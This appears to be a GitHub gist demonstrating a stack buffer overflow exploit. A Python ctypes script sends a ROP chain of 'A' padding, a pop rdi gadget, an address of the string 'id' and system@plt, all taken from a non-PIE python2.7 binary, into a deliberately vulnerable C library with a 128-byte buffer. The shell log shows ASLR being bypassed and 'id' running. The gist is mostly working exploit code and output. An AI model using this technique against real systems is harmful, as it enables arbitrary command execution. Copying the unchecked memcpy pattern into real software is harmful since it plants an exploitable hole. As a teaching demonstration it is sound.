-
-
Save ChaosData/ae6076cb1c3cc7b0a367 to your computer and use it in GitHub Desktop.
Python ctypes exploitation example via python2.7 binary not being compiled with -fPIE
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
from ctypes import * | |
libName = './libpwn.so' | |
libpwn = CDLL(libName) | |
payload = "A"*136 # buffer overflow | |
payload += "\xd4\x8a\x41\x00\x00\x00\x00\x00" # 0x0000000000418ad4 ; pop rdi; ret ;; from /usr/bin/python2.7 ; thanks https://github.com/JonathanSalwan/ROPgadget | |
payload += "\x19\xcb\x40\x00\x00\x00\x00\x00" # 40cb19 # "id\x00" from "setresgi\x00" | |
payload += '\x30\x68\x41\x00\x00\x00\x00\x00' # 0000000000416830 ; system@plt from /usr/bin/python2.7 | |
print libpwn.pwnme(create_string_buffer(payload, len(payload)), len(payload)) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
$ uname -a # Ubuntu 14.04 x86_64 | |
Linux ubuntu 3.13.0-43-generic #72-Ubuntu SMP Mon Dec 8 19:35:06 UTC 2014 x86_64 x86_64 x86_64 GNU/Linux | |
$ cat /proc/sys/kernel/randomize_va_space # yes, aslr is on | |
2 | |
$ bash checksec.sh --file /usr/bin/python2.7 # from http://trapkit.de/tools/checksec.sh | |
RELRO STACK CANARY NX PIE RPATH RUNPATH FILE | |
Partial RELRO Canary found NX enabled No PIE No RPATH No RUNPATH /usr/bin/python2.7 | |
$ gcc -std=c11 -Wall -fPIC -fPIE -Wl,-z,relro,-z,now -fno-stack-protector -shared -o libpwn.so pwn.c # ok, i cheated, stack cookies are disabled to make this easier | |
$ bash checksec.sh --file libpwn.so | |
RELRO STACK CANARY NX PIE RPATH RUNPATH FILE | |
Full RELRO No canary found NX enabled DSO No RPATH No RUNPATH libpwn.so | |
$ python ex.py | |
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAԊA | |
uid=1000(jtd) gid=1000(jtd) groups=1000(jtd),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),108(lpadmin),124(sambashare) | |
[1] 68603 segmentation fault (core dumped) python ex.py |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#include <stdio.h> | |
#include <string.h> | |
#include <signal.h> | |
int pwnme(char* str, int len) { | |
char buf[128] = {0}; | |
memcpy(buf, str, len); | |
puts(buf); | |
return 4; | |
} |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment